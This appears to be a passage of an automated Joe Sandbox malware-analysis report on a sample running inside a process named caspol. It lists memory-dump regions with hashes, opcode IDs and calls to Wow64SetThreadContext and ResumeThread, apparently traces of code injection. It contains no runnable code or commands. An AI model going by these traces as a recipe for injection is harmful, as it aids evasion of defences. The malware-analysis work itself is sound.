                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: eda22145724633b6c583d9331185860ec7353d3748c54ca6019816944e69c621
                                                                      • Instruction ID: 4e6b62e121a9cdb6975e4919152261ef7986474d07e42d53e80824388c38b7bc
                                                                      • Opcode Fuzzy Hash: eda22145724633b6c583d9331185860ec7353d3748c54ca6019816944e69c621
                                                                      • Instruction Fuzzy Hash: 2641BBB5D002589FCF10DFA9D884AEEFBB1AF49314F24846AE455B7244C738AA49CF64

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 1028 38d8a8-38d908 1030 38d90a-38d91c 1028->1030 1031 38d91f-38d96d Wow64SetThreadContext 1028->1031 1030->1031 1033 38d96f-38d975 1031->1033 1034 38d976-38d9c2 1031->1034 1033->1034
                                                                      APIs
                                                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 0038D957
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ContextThreadWow64
                                                                      • String ID:
                                                                      • API String ID: 983334009-0
                                                                      • Opcode ID: 41360ec09f4929af31c4dcab446ab900eb4391852077613e4d63ce234d4a86b5
                                                                      • Instruction ID: 3829027e02be0b8f170b4154fa675126beabd0cfbdf7046fc8ade48ba96e0e03
                                                                      • Opcode Fuzzy Hash: 41360ec09f4929af31c4dcab446ab900eb4391852077613e4d63ce234d4a86b5
                                                                      • Instruction Fuzzy Hash: 3741ACB5D002589FCF10DFA9D884AEEFBB1AF49314F24806AE415B7244D738A945CF54
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 0038D836
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 721de47c14d54e878141a0b8a82ef82127ae958a33b34fc5c79f9157a3a511db
                                                                      • Instruction ID: 9b5232bc295bb9c9af045fbb8a092dca36046da2331b55458ed661ccc28da171
                                                                      • Opcode Fuzzy Hash: 721de47c14d54e878141a0b8a82ef82127ae958a33b34fc5c79f9157a3a511db
                                                                      • Instruction Fuzzy Hash: 9C31CAB5D002089FCF14CFA9D984AEEFBB1AF49314F24846AE814B7340D734A906CF54
                                                                      APIs
                                                                      • ResumeThread.KERNELBASE(?), ref: 0038D836
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468692237.0000000000380000.00000040.00000800.00020000.00000000.sdmp, Offset: 00380000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_380000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID: ResumeThread
                                                                      • String ID:
                                                                      • API String ID: 947044025-0
                                                                      • Opcode ID: 004b7d03882be934d52bfa851acabd0bc4759fc631b704456377d6bca9611bcb
                                                                      • Instruction ID: 9d102da0591561b36cd727d9933889c529a91d3cc751a7da19c80584321ae664
                                                                      • Opcode Fuzzy Hash: 004b7d03882be934d52bfa851acabd0bc4759fc631b704456377d6bca9611bcb
                                                                      • Instruction Fuzzy Hash: 6B31BAB4D002189FCF14CFA9D984AAEFBB5AF49314F24946AE815B7340C735A905CF94
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: (
                                                                      • API String ID: 0-3887548279
                                                                      • Opcode ID: 1e0462014fde222e05c13e15d498308f61c74add02c85b22134747f4ce06036c
                                                                      • Instruction ID: e4594c2485e2c8fb9dc48fcc6b57fff71b70af64d2a0ea265e4f04fc2abd9abb
                                                                      • Opcode Fuzzy Hash: 1e0462014fde222e05c13e15d498308f61c74add02c85b22134747f4ce06036c
                                                                      • Instruction Fuzzy Hash: 5C01B675949218CFDB60CF64C988BECBBB9BB49304F5491D9D80DA3251C7319E86DF40
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f03d953cb6a665b99b32b44644170259e2d408590456460a01e2429722a0f297
                                                                      • Instruction ID: 656291f4ae379a4179de7472ac2f525bfde66a95d2e753d36002864eb8529802
                                                                      • Opcode Fuzzy Hash: f03d953cb6a665b99b32b44644170259e2d408590456460a01e2429722a0f297
                                                                      • Instruction Fuzzy Hash: 6751D4B4E05219CFCB04CFAAD9949AEFBF6BF89300F24A915D419A7356C770A841CF90
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ffb9a44221e7c8b79bbed4779f27d84056f98baac219dba554c626d746198259
                                                                      • Instruction ID: d1ced00f9a50497b501eac1c7f889eb706c8078f5ed0a10bc5fab13f820f8fb6
                                                                      • Opcode Fuzzy Hash: ffb9a44221e7c8b79bbed4779f27d84056f98baac219dba554c626d746198259
                                                                      • Instruction Fuzzy Hash: A5410875D4421ADFDB20CF65C844BE8BBB9BF99300F20A6EAD509B6240EB705AC5DF40
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3ac4f5fda024f366a033b67049acf03748a8ffdcd73786102a5ba76fabf96797
                                                                      • Instruction ID: eea3ce823ded39128bcccf79e27f1920ddd92c792a6dbf92a6ed5c23f58ce66b
                                                                      • Opcode Fuzzy Hash: 3ac4f5fda024f366a033b67049acf03748a8ffdcd73786102a5ba76fabf96797
                                                                      • Instruction Fuzzy Hash: 7A41EB38949218CFCB64CF54C998BE8BBB5AB4A315F24A1DAC44EB3291D7319AC5DF00
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: be4ffc91c97b0e376fd3e48990ca68867a3867b16d442affce7d0b48b476bed6
                                                                      • Instruction ID: 3b2de78f6366ddec2c7831524a72760197b76f0dcc0e3b2ab2049e143710751f
                                                                      • Opcode Fuzzy Hash: be4ffc91c97b0e376fd3e48990ca68867a3867b16d442affce7d0b48b476bed6
                                                                      • Instruction Fuzzy Hash: 0C310B74E09219CFDB04CFAAD8986EEBFB5AF99300F14A82AD406A3351D7705846DF40
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 417f3ef901775910b7179f96f79d8ba656c06aee24f6ea54923b3f7de1a18e55
                                                                      • Instruction ID: e9c21cb86c1f635c15d5dd5b2a9574aba9fc5736cbc80d70fde1ef99ba92f634
                                                                      • Opcode Fuzzy Hash: 417f3ef901775910b7179f96f79d8ba656c06aee24f6ea54923b3f7de1a18e55
                                                                      • Instruction Fuzzy Hash: E931D474E002188FDB04DFA4D859AAEBBB2FF8A310F209129D409BB799DB305D41CF90
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: de75fc0d70551424879c85bf79906e3dd7a6ae7b502796fbac569102f99914a9
                                                                      • Instruction ID: 659f25d86203f94e351a62955da7db3d463ce5fa5053337594ac8a1f6b663dad
                                                                      • Opcode Fuzzy Hash: de75fc0d70551424879c85bf79906e3dd7a6ae7b502796fbac569102f99914a9
                                                                      • Instruction Fuzzy Hash: E33194B4D05248DFCB04DFE5E8994EDBBB5BF89310B20A02AE816AB755D7305942CF11
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468343525.000000000033D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0033D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_33d000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1a267f806f6ebb33a19ee775fe420bbae3de6be51228db7ca6c47dc84699797f
                                                                      • Instruction ID: 1f4a1d924d0206ae11ad3fca3e3eb65321403551cbb80be074aa7220e8809973
                                                                      • Opcode Fuzzy Hash: 1a267f806f6ebb33a19ee775fe420bbae3de6be51228db7ca6c47dc84699797f
                                                                      • Instruction Fuzzy Hash: CC21D4B5604240EFDB16CF14E9C0B26BBA5FB84314F34C9ADE8498B256C736D84ACB61
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468343525.000000000033D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0033D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_33d000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: be8f781f43a066f1a8fb8df64f31c66aebabf1e3a7ca7bcd6c6c179c4b83a725
                                                                      • Instruction ID: 56110748352d12fd77e890f80dc5e5bba7208c6554272c655abe471f2bde6dff
                                                                      • Opcode Fuzzy Hash: be8f781f43a066f1a8fb8df64f31c66aebabf1e3a7ca7bcd6c6c179c4b83a725
                                                                      • Instruction Fuzzy Hash: 7A21C5B5604240DFDB1ACF14E8C4B26BF65EB84714F34C569E8494B656C336D847CB61
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468343525.000000000033D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0033D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_33d000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 23ea1ab1228b6360fd632fa0b615b43b6b21454dd832e5833278062370f2ed3e
                                                                      • Instruction ID: 659a3cdd2746e14931b094aedeb1d7f576ec5f8beb474ceb86b64c3312b65f53
                                                                      • Opcode Fuzzy Hash: 23ea1ab1228b6360fd632fa0b615b43b6b21454dd832e5833278062370f2ed3e
                                                                      • Instruction Fuzzy Hash: 12216D755083809FCB06CF24D994B11BFB1EB46714F29C5EAD8498F266C33A985ACB62
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: afeac17025fe957e858b20e96482b2ce3635190296a16912fdf0d36cfcebbd81
                                                                      • Instruction ID: 9351e49b637bd7eb2cd7ba8c8c8b59c87e908a74d24f72e6d9900398193bde2e
                                                                      • Opcode Fuzzy Hash: afeac17025fe957e858b20e96482b2ce3635190296a16912fdf0d36cfcebbd81
                                                                      • Instruction Fuzzy Hash: 7821C438E09218DFCB60CFA4C898BECBBB5AF89314F24A199940DA7255D7315A82CF40
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e792cee827ca20eea1b5dc3722b5dbf5234d188ab79e83d173bc6478187a4122
                                                                      • Instruction ID: d38dfd2a0281af9ee9f9198f0e223bdeb3bf7093e9552401b14136436607d6dc
                                                                      • Opcode Fuzzy Hash: e792cee827ca20eea1b5dc3722b5dbf5234d188ab79e83d173bc6478187a4122
                                                                      • Instruction Fuzzy Hash: 19214FB8D09259DFCB00DFE4E8999EDBBB5FF89310F20912AE806AB755D7305846DB00
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d77d10b4ce8824dca088f8f63361fe263faea9f1b236d13c1d7f652a1d0c69f2
                                                                      • Instruction ID: c245d643e87d334c63ded18c511f7ddf6779923361873f940101a6572d649389
                                                                      • Opcode Fuzzy Hash: d77d10b4ce8824dca088f8f63361fe263faea9f1b236d13c1d7f652a1d0c69f2
                                                                      • Instruction Fuzzy Hash: 69112E74945218DFDB60CF54C848BE8BBB8AB59300F20A0DDD54EB7280D7719AC2CF40
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c3f8884d733d351f98aa8d3c590e845b4040d116df599b17ae661c470991f2c1
                                                                      • Instruction ID: 473336710e68b0d9471c44a00cca1c5ae9b071631b59b1300f0462790abf036b
                                                                      • Opcode Fuzzy Hash: c3f8884d733d351f98aa8d3c590e845b4040d116df599b17ae661c470991f2c1
                                                                      • Instruction Fuzzy Hash: FF11E678D09209DFCB40DFA9D4556EEFFF1AB8A304F2491AAC859A3355D7304A02CF91
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.468343525.000000000033D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0033D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_33d000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                      • Instruction ID: 6f3c2b5aeb1ca76e727443e0bed775e69620a83046e9d1ba6b13e4deeb447383
                                                                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                                                      • Instruction Fuzzy Hash: 77118B75904280DFDB12CF14D5C4B16BBA1FB84314F28CAADD8498B656C33AD85ACBA1
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6ef731be43d8faf4ddd09d2933230e612194b899599d25d01f552c6681105520
                                                                      • Instruction ID: a65477bb39ce0a63aedc195a6787c82431502f494ec106c142020f54ef6b3ea6
                                                                      • Opcode Fuzzy Hash: 6ef731be43d8faf4ddd09d2933230e612194b899599d25d01f552c6681105520
                                                                      • Instruction Fuzzy Hash: 84111F38905214CFDB64CF54C598BE8BBF9AB4A315F24A4DEC44D67292C7319E86CF10
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 1498899f971e4d27bfd8e6e9efe1f1721a87c0b8153a8c8a7156bb05198b6c89
                                                                      • Instruction ID: 3e79a1ce9d97980514b0991633cd3afe1ddce9213ece41a53993850b5a10367e
                                                                      • Opcode Fuzzy Hash: 1498899f971e4d27bfd8e6e9efe1f1721a87c0b8153a8c8a7156bb05198b6c89
                                                                      • Instruction Fuzzy Hash: C91190B8D0420ADFCB44DFA9D5596AEFBF5BB89300F2490AAC819A3354E7305A41CF91
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 95cbd5a55d2a851866a1fb1c5671f8f6a817e3e2901860a1686af9522076fe02
                                                                      • Instruction ID: 41f901b82b9f1d9b535ed1f62613735a60a87f0364295bbd1c1241108773dae0
                                                                      • Opcode Fuzzy Hash: 95cbd5a55d2a851866a1fb1c5671f8f6a817e3e2901860a1686af9522076fe02
                                                                      • Instruction Fuzzy Hash: DF11ED75A45218DFDB60CF54CC84BE8BBB8AB59300F24A0DDD50EB7280D7719A85CF10
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bbd249e56f57bae1f0739bf3362acab5fb9d10e85fc1d772d660e94226992fc9
                                                                      • Instruction ID: efe32f0cf0555ea92d77db9784f8b3d21d971a55f5daf4eada84b692dae04aff
                                                                      • Opcode Fuzzy Hash: bbd249e56f57bae1f0739bf3362acab5fb9d10e85fc1d772d660e94226992fc9
                                                                      • Instruction Fuzzy Hash: DE112774908228CFCB65DF64C889BECBBF5AB49300F1450D9D40EAB282CB304AC8CF10
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8d1d6ed959e8837fd88e5999da550262cbfc0b7112678b8e51c3adcf49de65f5
                                                                      • Instruction ID: 35039bdef1f91e43458b8306d1cce85bb9016c7c11ecadb9a7f2c27dd8966e88
                                                                      • Opcode Fuzzy Hash: 8d1d6ed959e8837fd88e5999da550262cbfc0b7112678b8e51c3adcf49de65f5
                                                                      • Instruction Fuzzy Hash: 8B012C79944218DFDB20CF50CC84BECBBB8AB19300F24A1D9D50DB7281D7706A85CF40
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6bf53fc14498f9132c2b50c8f5d09e83f440d3fb8f1844db15bfe39f11c41031
                                                                      • Instruction ID: 04159d2e2256ec381dbb1aadc603ce17ea3fcd7adf0f178115a83465e5b17081
                                                                      • Opcode Fuzzy Hash: 6bf53fc14498f9132c2b50c8f5d09e83f440d3fb8f1844db15bfe39f11c41031
                                                                      • Instruction Fuzzy Hash: 2C014074E082549FCB51CB64CC98ADCBFB1BF4A304F2490EAD509AB246C7315A41CF00
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8f1872726b76249f8223c19ddff863a17bb734360c263cb7b3021177b6dee530
                                                                      • Instruction ID: 66b449cccb58f9ee37dc917dffbfa8d7b06c7390a0bf2365decd7a5ddc2430d7
                                                                      • Opcode Fuzzy Hash: 8f1872726b76249f8223c19ddff863a17bb734360c263cb7b3021177b6dee530
                                                                      • Instruction Fuzzy Hash: 8E011935905228CFCF60CFA0C954BEDBBB9AB49304F2460DD940DA7251C2329A86DF41
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4a4f4a39d3f92b9f3eab4cd96a5495790c7a793453e2256bd873da7bf33ab284
                                                                      • Instruction ID: 8396fe7f2c964e03c368fbb0a8411dfe49fd4bdc57c636012e89798ba7edb717
                                                                      • Opcode Fuzzy Hash: 4a4f4a39d3f92b9f3eab4cd96a5495790c7a793453e2256bd873da7bf33ab284
                                                                      • Instruction Fuzzy Hash: 9D014934D18354CFC715CB24C8586ECBBB5BB46311F1895DA885DA72D2D7304946CF54
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: ee275ef3d3171bf1b0926675fabe0e0f5e1ab007d5812f51b7edb6fb05ed1477
                                                                      • Instruction ID: 827ab6428d7b5dc54355c8cb8ec84f5443565f5c2c304b0475fadf3425875783
                                                                      • Opcode Fuzzy Hash: ee275ef3d3171bf1b0926675fabe0e0f5e1ab007d5812f51b7edb6fb05ed1477
                                                                      • Instruction Fuzzy Hash: DFF0F474E00209AFCB40DFB9C9846AEFBF5EB49304F1495AAC858E3310E7319A01CB80
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 79cc22a590553122f8e64a9d8461da243e43e16e6b2ccae979969c0146577e07
                                                                      • Instruction ID: c94840ca7f118adf5b9ab02f490be006de6ce71e5553bc56b458bb7a51f87aa9
                                                                      • Opcode Fuzzy Hash: 79cc22a590553122f8e64a9d8461da243e43e16e6b2ccae979969c0146577e07
                                                                      • Instruction Fuzzy Hash: D5F06770D08688DFC705DFA8E8582ACBFB5BB4B301F1491DAC448AB392D7340A41DF48
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d14c750d1c3819a132cc99795d93dfb57140e360d5b56fa5137896f74a150c50
                                                                      • Instruction ID: 31227dc244d798556d9b033d57ff3bf075a5761ff8a55fe7196d7f74583b407a
                                                                      • Opcode Fuzzy Hash: d14c750d1c3819a132cc99795d93dfb57140e360d5b56fa5137896f74a150c50
                                                                      • Instruction Fuzzy Hash: 7301AB75940228AFDBA4DF54C895BD8BBF5EB48315F2080D9D60DA7280DB319F88CF50
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 41869b99659cc77f4f460405531c894483e96febc6337a01027dced55ac908c9
                                                                      • Instruction ID: 6f4895f1468f9a3c7b96107e2e4cbdef0d4646bbe6fd7e570d47bfb595ae6fdd
                                                                      • Opcode Fuzzy Hash: 41869b99659cc77f4f460405531c894483e96febc6337a01027dced55ac908c9
                                                                      • Instruction Fuzzy Hash: 06F0E530D05209DFCB44DFB8D9586ADBBB9FB4E301F1091A9C409A3355D7345A41DF48
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b75171516dcb1f91180b92ad34874da39021579a8f2fddb2a7ed288567e86ad9
                                                                      • Instruction ID: 6bfb669c3f738728e3227fa7477ce3472fbabf290da340992e22094f7e25cbc3
                                                                      • Opcode Fuzzy Hash: b75171516dcb1f91180b92ad34874da39021579a8f2fddb2a7ed288567e86ad9
                                                                      • Instruction Fuzzy Hash: 06F03034A593989FCB15DF78D86468C7FF0AF4A201F1541EEC845D72A2D6349958CF02
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4c1604a109113eb85f674aaeaed05cf5c65a207d68fee39ca8fd4ac6a1581c15
                                                                      • Instruction ID: 83064a40efd2efc26f4aedee483b86a78ed5fc5e877bd9f8cc7ba32dfdfe7da2
                                                                      • Opcode Fuzzy Hash: 4c1604a109113eb85f674aaeaed05cf5c65a207d68fee39ca8fd4ac6a1581c15
                                                                      • Instruction Fuzzy Hash: 54E09230D193849FDB01DBBCD46538CBFB09B07601F1841EEC88497352D2300A44CB52
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_11_2_e30000_caspol.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6a8738301dfc969aa68eca4044f1b4b638f1083838f548c967ed6e5d9f639d30
                                                                      • Instruction ID: cd10acee564217a3baa8a86ecf9b5f12414012c3d228b0af0c5ae5b2d0ea9544
                                                                      • Opcode Fuzzy Hash: 6a8738301dfc969aa68eca4044f1b4b638f1083838f548c967ed6e5d9f639d30
                                                                      • Instruction Fuzzy Hash: 8AE01A7084D2449FDB05DBB8986879CBF70EB97305F2451DEC48567292C2341956DB52
                                                                      Memory Dump Source
                                                                      • Source File: 0000000B.00000002.470662441.0000000000E30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
